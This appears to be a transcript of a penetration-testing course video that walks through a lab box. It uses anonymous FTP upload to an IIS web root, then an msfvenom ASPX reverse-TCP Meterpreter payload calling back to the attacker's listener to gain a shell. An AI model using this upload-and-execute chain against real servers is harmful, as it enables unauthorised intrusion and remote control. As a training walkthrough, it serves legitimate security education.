All right, so I am back now with the scan, and you can see that I have the scan here, which is showing us port 21 and port 80 open. Now, when we look at port 21, we've got the file transfer protocol. Now, if you recall, that just means that we can upload and download files off of a server. We're just transferring files. And we can see here that we have anonymous login via the FTP, and the files look almost like a default IIS web page. We've got the IIS start.htm, and if you've ever seen that, you know you're just looking at the, hey, this is a web page, hasn't been built yet. You got the welcome.png. It feels very, very welcome page. And then we've got port 80, which is just saying, hey, it's Microsoft IIS. And it's got an IIS 7 header, but it doesn't really say anything about what's on there. So let's make a quick little journey out to the web server and see at 10.10.10.5 what we've got. And there it is. It's a welcome page. Now, if we right click on this and we say save image as, you can see the image is actually welcome.png. So I have a little hunch when I'm just looking at this scan that we're actually sitting in the web server directory itself. Now, what we have here is we have port 21 open, and while anonymous login is bad, all we can do is put and delete files. It becomes really bad when we can chain that exploit and actually execute a file. So my hunch is that we can upload something malicious and then execute it with port 80. So we're going to go ahead and test that out. First, we're going to just do a quick echo and say this is a test. And I'm going to put that into a file called test.txt. From here, I'm going to go ahead and FTP out to the server, and I'm going to see if I can upload this file and then access it. So I'm going to go ahead and just type in anonymous and try to log in. And I'm using anonymous as the password as well. We can go ahead and just say put, and we'll say test.txt. Now, if we go out to the web, once that file is uploaded, and we say test.txt, you can see it says, this is a test. Okay, that works. So what we're going to do now is, now that we know we have execution, we can go ahead and get malicious. We can go with the new tab. And what we want to do is we want an ASPX type exploit. Now, why do I say that? Because this is an IIS server. We can see if you're utilizing something like Wappalizer, we've got ASP.NET. Obviously, it tells us IIS. So the file extension for that is ASPX. Now, if you've never done this before, you can go out to Google and say interpreter payload cheat sheet, something along these lines. And we've got Metasploit, payload cheat sheet, MSF Venom cheat sheet. We'll go ahead and just use the MSF Venom cheat sheet. And any sort of web payloads, we're looking for something like ASP or ASPX. So this one will work right here. Creates a simple TCP shell for ASP. So we're just going to use MSF Venom -p Windows interpreter verse _ TCP. We'll set our L host, our L port, and then our file type. So that's the kind of syntax we're going to be using. You can just follow along with me. You don't have to actually go out to that website and copy and paste everything. So this is going to be the initial start of the payload. We're going to say Windows interpreter reverse _ TCP for the payload. And then we need the L host, which I don't know my L host. So I'm going to go out and say ifconfig. And I am connected here 10.10.14.4. So I'm going to go ahead and use that as my L host. And then for my L port, I'm just going to say all fours. And then remember, we're going to need the file type. So for this, I'm going to use ASPX. And then we're going to go ahead and just call it exploit.aspx. And that should generate a shell for us. Now, once that is generated, what we're going to need to do is we're actually going to need to load up Metasploit. Now, this course is not going to rely on Metasploit a lot. This is just the initial exploit vector, and I'm going to show you some initial enumeration that you can do with Metasploit, but everything is going to be pretty manual moving forward after this little bit. So let's go ahead and we're going to use exploit multi-handler, sorry. And we're going to go ahead and say options. So what we're going to do is we're going to set the same payload that we just did. So we're going to set payload to Windows interpreter. And then we're going to say reverse TCP. You should be able to tab it out. Now, if we go to options, you can see that it automatically sets the L port to the default 4444. We also need to set an L host. So I'm going to set my L host to tunnel 0, which is the interface that we are on right now. So if you're on a different interface, or you could set it directly to the IP address. And then I'm going to run this. And this is going to set up that listener. So now we're listening on this port for a reverse connection using Metasploit to do so. So I'm going to go in here and I'm going to reconnect because chances are this FTP is probably timed out. I'm going to go in here and just reconnect real quick. And we're going to upload this file. So now we're going to put the exploit.aspx. And with our listener running, we're going to go ahead and go out to the web. I'm going to close this out. And I'm just going to / exploit.aspx, just like this. Hit enter. Let's see what happens. Okay, we've got a interpreter session. So session 1 is open. We can say get UID, see if that works. Okay, and we can say sysinfo. And you can see that we are on a Windows 7 machine, 32-bit or x86 architecture. We have a 32-bit interpreter shell. And our ID here is IIS apppool/web. So we are not an administrator. We are not authority system. So that means we have privileges to escalate. So we're at the perfect stopping point. And if this didn't make sense to you, maybe you're not ready for this part of the course yet. Maybe this is a little advanced. You might need to go back and do some more studying. You could check out my other Udemy course as well, which is takes this and walks you through a lot more step-by-step and will get you ready for something along these lines. But if this all made sense, you figured this out already, we're good to go. We're good to move on, and we're going to start working on these escalations. So I'm going to see you in the next set of videos where we start talking about enumeration and how we're going to look at and identify things that can be potentially exploitable and allow us to escalate our privileges. So I'll see you over in the next video.